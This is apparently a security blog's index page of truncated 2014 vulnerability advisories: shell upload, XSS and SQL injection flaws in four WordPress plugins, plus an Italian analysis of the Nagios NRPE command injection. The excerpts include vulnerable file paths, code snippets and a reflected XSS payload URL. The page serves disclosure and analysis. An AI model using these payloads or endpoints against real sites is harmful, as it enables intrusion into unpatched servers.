bug | HomeLab IT

WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities

###################### # Exploit Title : WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities # Exploit Author : Claudio Viviani # Vendor Homepage : http://www.tidioelements.com/ # Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip # Date : 2014-07-14 # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell ###################### # Vulnerablity n°1: XSS Reflected Unauthenticated http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script> # Vulnerablity n°2: Unprivileged user like subscriber could upload shell script....

WordPress Download Manager 2.6.8 Shell Upload Vulnerability

###################### # Exploit Title : WordPress Download Manager 2.6.8 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : www.wpdownloadmanager.com # Software Link : http://downloads.wordpress.org/plugin/download-manager.zip # Date : 2014-07-11 # Tested on : Linux / Mozilla Firefox / WordPress Download Manager 2.6.8 Free Version # # # WORK ONLY ON SERVER WITH .HTACCESS FILES DISABLED ###################### # Location : http://IP_VICTIM/wp-content/plugins/download-manager/wpdm-add-new-file.php ###################### # Description : WordPress Download Manager 2....

WordPress BSK PDF Manager 1.3.2 SQL Injection

###################### # Exploit Title : WordPress BSK PDF Manager 1.3.2 Authenticated SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/ # Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip # Date : 2014-07-04 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Location : http://localhost/wp-content/plugins/compfight/compfight-search.php ###################### # Vulnerable code : [claudio@localhost ~]$ grep -R GET bsk-pdf-manager/ bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){ bsk-pdf-manager/inc/bsk-pdf-dashboard....

WordPress Compfight <= 1.4 Authenticated Reflected XSS Vulnerability

###################### # Exploit Title : WordPress Compfight 1.4 Authenticated Cross Site Scripting # Exploit Author : Claudio Viviani - HomeLab IT # Vendor Homepage : http://wordpress.org/plugins/easy-banners/ # Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip # Date : 2014-07-03 # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://localhost/wp-content/plugins/compfight/compfight-search.php ###################### # Vulnerable code : if (!$search_value) { $input_text = 'Enter Keyword(s)'; } else { $input_text = $search_value; } if ($show_title) { $output ....

Nagios NRPE <= 2.15 Remote Command Injection: Analisi, test e fix della vulnerabilità

Informazioni generali Qualche giorno fa è stato scovato un bug sul noto monitor d’infrastrutture Nagios, più precisamente la vurnerabilità riguarda l’agent NRPE (Nagios Remote Plugin Executor). ============================================= - Release date: 17.04.2014 - Discovered by: Dawid Golunski - Severity: High ============================================= CVE: 2014-2913 Nrpe è un agent che viene installato su tutte le macchine monitorare da Nagios e a seconda delle varie personalizzazioni può restituire varie informazioni, come ad esempio lo stato del disco rigido, della memoria, la funzionalità o meno di determinati servizi ecc....